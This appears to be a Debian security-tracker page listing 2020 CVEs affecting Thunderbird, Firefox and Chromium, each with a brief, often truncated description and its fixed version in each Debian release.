Debian Thunderbird vulnerabilities

CVE-2020-16012 [MEDIUM] CVE-2020-16012: chromium - Side-channel information leakage in graphics in Google Chrome prior to 87.0.4280... Side-channel information leakage in graphics in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to leak cross-origin data via a crafted HTML page. Scope: local bookworm: resolved (fixed in 87.0.4280.88-0.1) bullseye: resolved (fixed in 87.0.4280.88-0.1) forky: resolved (fixed in 87.0.4280.88-0.1) sid: resolved (fixed in 87.0.4280.88-0.1) trixie: res

CVE-2020-12392 [MEDIUM] CVE-2020-12392: firefox - The 'Copy as cURL' feature of Devtools' network tab did not properly escape the ... The 'Copy as cURL' feature of Devtools' network tab did not properly escape the HTTP POST data of a request, which can be controlled by the website. If a user used the 'Copy as cURL' feature and pasted the command into a terminal, it could have resulted in the disclosure of local files. This vulnerability affects Firefox ESR < 68.8, Firefox < 76, and Thunderbird <

CVE-2020-26956 [MEDIUM] CVE-2020-26956: firefox - In some cases, removing HTML elements during sanitization would keep existing SV... In some cases, removing HTML elements during sanitization would keep existing SVG event handlers and therefore lead to XSS. This vulnerability affects Firefox < 83, Firefox ESR < 78.5, and Thunderbird < 78.5. Scope: local sid: resolved (fixed in 83.0-1)

CVE-2020-12418 [MEDIUM] CVE-2020-12418: firefox - Manipulating individual parts of a URL object could have caused an out-of-bounds... Manipulating individual parts of a URL object could have caused an out-of-bounds read, leaking process memory to malicious JavaScript. This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and Thunderbird < 68.10.0. Scope: local sid: resolved (fixed in 78.0-1)

CVE-2020-6812 [MEDIUM] CVE-2020-6812: firefox - The first time AirPods are connected to an iPhone, they become named after the u... The first time AirPods are connected to an iPhone, they become named after the user's name by default (e.g. Jane Doe's AirPods.) Websites with camera or microphone permission are able to enumerate device names, disclosing the user's name. To resolve this issue, Firefox added a special case that renames devices containing the substring 'AirPods' to simply 'AirPods'.

CVE-2020-15664 [MEDIUM] CVE-2020-15664: firefox - By holding a reference to the eval() function from an about:blank window, a mali... By holding a reference to the eval() function from an about:blank window, a malicious webpage could have gained access to the InstallTrigger object which would allow them to prompt the user to install an extension. Combined with user confusion, this could result in an unintended or malicious extension being installed. This vulnerability affects Firefox < 80, Thund

CVE-2020-6514 [MEDIUM] CVE-2020-6514: chromium - Inappropriate implementation in WebRTC in Google Chrome prior to 84.0.4147.89 al... Inappropriate implementation in WebRTC in Google Chrome prior to 84.0.4147.89 allowed an attacker in a privileged network position to potentially exploit heap corruption via a crafted SCTP stream. Scope: local bookworm: resolved (fixed in 87.0.4280.88-0.1) bullseye: resolved (fixed in 87.0.4280.88-0.1) forky: resolved (fixed in 87.0.4280.88-0.1) sid: resolved (fixe

CVE-2020-26978 [MEDIUM] CVE-2020-26978: firefox - Using techniques that built on the slipstream research, a malicious webpage coul... Using techniques that built on the slipstream research, a malicious webpage could have exposed both an internal network's hosts as well as services running on the user's local machine. This vulnerability affects Firefox < 84, Thunderbird < 78.6, and Firefox ESR < 78.6. Scope: local sid: resolved (fixed in 84.0-1)

CVE-2020-6793 [MEDIUM] CVE-2020-6793: thunderbird - When processing an email message with an ill-formed envelope, Thunderbird could ... When processing an email message with an ill-formed envelope, Thunderbird could read data from a random memory location. This vulnerability affects Thunderbird < 68.5. Scope: local bookworm: resolved (fixed in 1:68.5.0-1) bullseye: resolved (fixed in 1:68.5.0-1) forky: resolved (fixed in 1:68.5.0-1) sid: resolved (fixed in 1:68.5.0-1) trixie: resolved (fixed in

CVE-2020-26953 [MEDIUM] CVE-2020-26953: firefox - It was possible to cause the browser to enter fullscreen mode without displaying... It was possible to cause the browser to enter fullscreen mode without displaying the security UI; thus making it possible to attempt a phishing attack or otherwise confuse the user. This vulnerability affects Firefox < 83, Firefox ESR < 78.5, and Thunderbird < 78.5. Scope: local sid: resolved (fixed in 83.0-1)

CVE-2020-6794 [MEDIUM] CVE-2020-6794: thunderbird - If a user saved passwords before Thunderbird 60 and then later set a master pass... If a user saved passwords before Thunderbird 60 and then later set a master password, an unencrypted copy of these passwords is still accessible. This is because the older stored password file was not deleted when the data was copied to a new format starting in Thunderbird 60. The new master password is added only on the new file. This could allow the exposure o

CVE-2020-6792 [MEDIUM] CVE-2020-6792: thunderbird - When deriving an identifier for an email message, uninitialized memory was used ... When deriving an identifier for an email message, uninitialized memory was used in addition to the message contents. This vulnerability affects Thunderbird < 68.5. Scope: local bookworm: resolved (fixed in 1:68.5.0-1) bullseye: resolved (fixed in 1:68.5.0-1) forky: resolved (fixed in 1:68.5.0-1) sid: resolved (fixed in 1:68.5.0-1) trixie: resolved (fixed in 1:68

CVE-2020-16042 [MEDIUM] CVE-2020-16042: chromium - Uninitialized Use in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote ... Uninitialized Use in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. Scope: local bookworm: resolved (fixed in 87.0.4280.88-0.1) bullseye: resolved (fixed in 87.0.4280.88-0.1) forky: resolved (fixed in 87.0.4280.88-0.1) sid: resolved (fixed in 87.0.4280.88

CVE-2020-15658 [MEDIUM] CVE-2020-15658: firefox - The code for downloading files did not properly take care of special characters,... The code for downloading files did not properly take care of special characters, which led to an attacker being able to cut off the file ending at an earlier position, leading to a different file type being downloaded than shown in the dialog. This vulnerability affects Firefox ESR < 78.1, Firefox < 79, and Thunderbird < 78.1. Scope: local sid: resolved (fixed in

CVE-2020-15663 [HIGH] CVE-2020-15663: firefox - If Firefox is installed to a user-writable directory, the Mozilla Maintenance Se... If Firefox is installed to a user-writable directory, the Mozilla Maintenance Service would execute updater.exe from the install location with system privileges. Although the Mozilla Maintenance Service does ensure that updater.exe is signed by Mozilla, the version could have been rolled back to a previous version which would have allowed exploitation of an older bu

CVE-2020-6797 [MEDIUM] CVE-2020-6797: firefox - By downloading a file with the .fileloc extension, a semi-privileged extension c... By downloading a file with the .fileloc extension, a semi-privileged extension could launch an arbitrary application on the user's computer. The attacker is restricted as they are unable to download non-quarantined files or supply command line arguments to the application, limiting the impact. Note: this issue only occurs on Mac OSX. Other operating systems are unaf

CVE-2020-12393 [HIGH] CVE-2020-12393: firefox - The 'Copy as cURL' feature of Devtools' network tab did not properly escape the ... The 'Copy as cURL' feature of Devtools' network tab did not properly escape the HTTP method of a request, which can be controlled by the website. If a user used the 'Copy as cURL' feature and pasted the command into a terminal, it could have resulted in command injection and arbitrary command execution. *Note: this issue only affects Firefox on Windows operating sys

CVE-2020-15657 [HIGH] CVE-2020-15657: firefox - Firefox could be made to load attacker-supplied DLL files from the installation ... Firefox could be made to load attacker-supplied DLL files from the installation directory. This required an attacker that is already capable of placing files in the installation directory. *Note: This issue only affected Windows operating systems. Other operating systems are unaffected.*. This vulnerability affects Firefox ESR < 78.1, Firefox < 79, and Thunderbird <

CVE-2020-35112 [HIGH] CVE-2020-35112: firefox - If a user downloaded a file lacking an extension on Windows, and then "Open"-ed ... If a user downloaded a file lacking an extension on Windows, and then "Open"-ed it from the downloads panel, if there was an executable file in the downloads directory with the same name but with an executable extension (such as .bat or .exe) that executable would have been launched instead. *Note: This issue only affected Windows operating systems. Other operating

CVE-2020-26966 [MEDIUM] CVE-2020-26966: firefox - Searching for a single word from the address bar caused an mDNS request to be se... Searching for a single word from the address bar caused an mDNS request to be sent on the local network searching for a hostname consisting of that string; resulting in an information leak. *Note: This issue only affected Windows operating systems. Other operating systems are unaffected.*. This vulnerability affects Firefox < 83, Firefox ESR < 78.5, and Thunderbir